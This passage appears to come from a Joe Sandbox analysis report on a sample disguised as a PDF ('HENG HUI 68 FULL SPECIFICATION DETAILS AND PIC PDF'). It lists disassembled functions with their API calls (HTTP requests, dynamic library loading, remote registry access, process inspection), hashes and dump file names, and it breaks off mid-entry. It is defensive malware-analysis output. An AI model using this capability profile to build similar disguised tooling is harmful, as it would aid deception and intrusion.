                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                      • Instruction ID: 888a656e4762e63aa23637427b8c8d6dba5f537ee0bc72c27d7c183b3014058a
                                      • Opcode Fuzzy Hash: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                      • Instruction Fuzzy Hash: F5F05E36141211ABD7172BA4EC89EAA772DFF84301F190876F503D50A0DBB9A801DB50
                                      Function 0039AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0039B006
                                      • CharUpperBuffW.USER32(?,?), ref: 0039B115
                                      • VariantClear.OLEAUT32(?), ref: 0039B298
                                        • Part of subcall function 00389DC5: VariantInit.OLEAUT32(00000000), ref: 00389E05
                                        • Part of subcall function 00389DC5: VariantCopy.OLEAUT32(?,?), ref: 00389E0E
                                        • Part of subcall function 00389DC5: VariantClear.OLEAUT32(?), ref: 00389E1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                      • Instruction ID: 01e8f49947b6efb1bfe7c709583ba47fa7f3009c7d72d66e56df4d3a07e6b68b
                                      • Opcode Fuzzy Hash: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                      • Instruction Fuzzy Hash: 49916A746083019FCB12DF24D58595BBBE8EF89704F04486EF89A9B362DB31ED05CB52
                                      Function 00380213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003802B1
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003802C2
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00380344
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                      • Instruction ID: 9ffe86564346fb34d576bd6a506658055ee4a4f7eec926631ce95dbc043f3fad
                                      • Opcode Fuzzy Hash: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                      • Instruction Fuzzy Hash: D8413C75600304EFDB8ADF64C885B9A7BA9EF44310B1580ADA909DF206D7F1DA48CBA0
                                      Function 0038E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038E742
                                      • GetLastError.KERNEL32(?,00000000), ref: 0038E768
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038E78D
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038E7B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID: p1Kw`KLw
                                      • API String ID: 3321077145-1011832795
                                      • Opcode ID: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                      • Instruction ID: 2ff098c2a796eee4ca73aa37b4c36312a3d35776551f50e8bec26eef5fec9659
                                      • Opcode Fuzzy Hash: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                      • Instruction Fuzzy Hash: 494102396006109FCB12AF55C444A4EBBE5BF9A720B198499F946AF3B2CB74FD008B91
                                      Function 003A0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 003A0587
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 2358735015-567219261
                                      • Opcode ID: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                      • Instruction ID: 66922b11276190e711b0bcd1b731ccf5836ed2d060b89ee14986d8719a9ed267
                                      • Opcode Fuzzy Hash: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                      • Instruction Fuzzy Hash: E531923091021AAFCF06EF54C8419EEB3B4FF56314B104629E866AB6E1DB71E915CB80
                                      Function 0037B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0037B88E
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0037B8A1
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0037B8D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: d9d699619c24ca5905c8c1e6db8adb0550b35e097d5a547a84f1ebb2801a1a59
                                      • Instruction ID: 1685acd96d17723b135c38fd7fd72acc1a4291d3988349c0d73db05213e92761
                                      • Opcode Fuzzy Hash: d9d699619c24ca5905c8c1e6db8adb0550b35e097d5a547a84f1ebb2801a1a59
                                      • Instruction Fuzzy Hash: F521F671900108BFDB269B64D886EFEB7BCDF06350F108129F565AB1E0DB785D0A9760
                                      Function 003943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00394427
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00394457
                                      • InternetCloseHandle.WININET(00000000), ref: 0039449E
                                        • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 1951874230-3916222277
                                      • Opcode ID: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                      • Instruction ID: 56628d566580987b3286291d56a1ddea5114e0dabbf85f5ca49c438e74d8545a
                                      • Opcode Fuzzy Hash: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                      • Instruction Fuzzy Hash: E6219FB2500208BFEB139F55CC85EBFB6FCEB48B48F11802AF509E6240EA749D069771
                                      Function 003A90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A915C
                                      • LoadLibraryW.KERNEL32(?), ref: 003A9163
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A9178
                                      • DestroyWindow.USER32(?), ref: 003A9180
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                      • Instruction ID: c36df3370eec123d1add2d2f1523054229c21b743e25463236ef8793aca35a8a
                                      • Opcode Fuzzy Hash: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                      • Instruction Fuzzy Hash: AA21A171200206BBEF224F64DC84FBB37ADEF9A364F11462AF954E6190C735DC52A760
                                      Function 00389568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00389588
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003895B9
                                      • GetStdHandle.KERNEL32(0000000C), ref: 003895CB
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00389605
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                      • Instruction ID: 3810732b695f9c1af9bbca2ae109d9c6f4500277782ab3c387fede9884c2104e
                                      • Opcode Fuzzy Hash: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                      • Instruction Fuzzy Hash: 1C215170600305ABDB22AF65DC05FAE77E8AF46724F244A6AF9A1D72D0D770E944CB10
                                      Function 00389634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00389653
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00389683
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00389694
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003896CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                      • Instruction ID: 60905a4f2a1b963e4bb784ddee4f7790b56d9c9ebbf04ade834b8298cf796abf
                                      • Opcode Fuzzy Hash: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                      • Instruction Fuzzy Hash: 562183716003059BDB22AF699C45FAAB7ECAF45730F280A5AF8A1E72D0F770D841CB50
                                      Function 00378B91 Relevance: 7.7, APIs: 5, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,003F6F88,7FFFFFFF,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00378C40
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378CBA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378D2C
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378D45
                                        • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00378E4B,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00378DB6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 1443698708-0
                                      • Opcode ID: 3967cdd121d2f8c060752492e67586b3636d44d5ccdc4fd78ab6c887170f9644
                                      • Instruction ID: cca772bbc7beda74c7ec9f0af8b29ce013dcc54be24cb9b9eeb4b84767b54ebc
                                      • Opcode Fuzzy Hash: 3967cdd121d2f8c060752492e67586b3636d44d5ccdc4fd78ab6c887170f9644
                                      • Instruction Fuzzy Hash: 3D71D471D412169FDF379F648899AEEBBB9EF19360F168119E809A7290DF399C008760
                                      Function 003A1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003A19F3
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003A1A26
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003A1B49
                                      • CloseHandle.KERNEL32(?), ref: 003A1BBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                      • Instruction ID: e0e468090f8d72538a3550f6423969b761733dcd7632f9165b0b91f58d7a2e46
                                      • Opcode Fuzzy Hash: b5288c7276683cf8431f8192efd799b84e07ce49bbd1c7d86525ca9bebee9930
                                      • Instruction Fuzzy Hash: 3A816270600214ABDF12AF64C886FAEBBF5EF49720F148459F905AF3D2D7B4A945CB90
                                      Function 003AE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003AE1D5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AE20D
                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 003AE248
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003AE269
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003AE281
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                      • String ID:
                                      • API String ID: 3188977179-0
                                      • Opcode ID: 66d8967331dba783898496f71c3622d9b7d2bc81a5a15cec88153ff965f57511
                                      • Instruction ID: 052b88e8a3d8c41df64aa296796368aabc151d3e3478ad6a5be168bf2ef7819b
                                      • Opcode Fuzzy Hash: 66d8967331dba783898496f71c3622d9b7d2bc81a5a15cec88153ff965f57511
                                      • Instruction Fuzzy Hash: EE61B334A00214AFDB26DF58CC94FAA7BBAEF8A300F154469F9599B3A1C775AD40CB10
                                      Function 00381C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00381CB4
                                      • VariantClear.OLEAUT32(00000013), ref: 00381D26
                                      • VariantClear.OLEAUT32(00000000), ref: 00381D81
                                      • VariantClear.OLEAUT32(?), ref: 00381DF8
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00381E26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType
                                      • String ID:
                                      • API String ID: 4136290138-0
                                      • Opcode ID: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                      • Instruction ID: 721b5ebd124825e1bee12e112567ac209890216a61c61233cc0c9ad664937fc0
                                      • Opcode Fuzzy Hash: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                      • Instruction Fuzzy Hash: 105139B5A00209EFDB15DF58C880EAAB7B8FF4C314B158559ED59DB301E730EA56CBA0
                                      Function 003A0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003A06EE
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003A077D
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 003A079B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 003A07E1
                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 003A07FB
                                        • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0038A574,?,?,00000000,00000008), ref: 0035E675
                                        • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0038A574,?,?,00000000,00000008), ref: 0035E699
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                      • String ID:
                                      • API String ID: 666041331-0
                                      • Opcode ID: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                      • Instruction ID: dc69d09052d2851b10356aad45d4c25c05c3ceeecfdee83570e0c288c656f9d1
                                      • Opcode Fuzzy Hash: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                      • Instruction Fuzzy Hash: 60511575A002059FCB06EFA8C481DADB7F9EF59310B058069E916AF362DB71FE45CB90
                                      Function 003A2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2EEF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A2F2E
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A2F75
                                      • RegCloseKey.ADVAPI32(?,?), ref: 003A2FA1
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A2FAE
                                      Memory Dump Source
